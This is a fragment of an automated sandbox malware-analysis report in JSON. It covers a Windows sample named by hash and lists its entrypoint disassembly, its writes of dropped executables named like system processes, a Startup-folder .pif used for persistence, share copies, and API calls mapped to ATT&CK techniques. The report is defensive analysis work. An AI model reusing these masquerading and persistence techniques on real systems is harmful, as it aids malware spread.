al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE5DF0.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE466A.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE466E.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE5DF3.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe.cfg\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe.cfg\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe.Local\\\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"LSASS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\" (UID: 5080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5080)\n \"D3_08.exe\" queries basic process information of the \"C:\\Windows\\AppPatch\\sysmain.sdb\" (UID: 5160)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5160)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5160)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 4880)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 4880)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 5072)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5072)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\d3_08.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE5DF0.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE466A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE466E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5DF3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00005160]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE5F75.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5F79.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" reads file \"c:\\users\\desktop.ini\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" reads file \"c:\\0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004880)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004596)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004596)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005356)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005356)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005452)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005452)\n \"CSRSS.EXE\" called 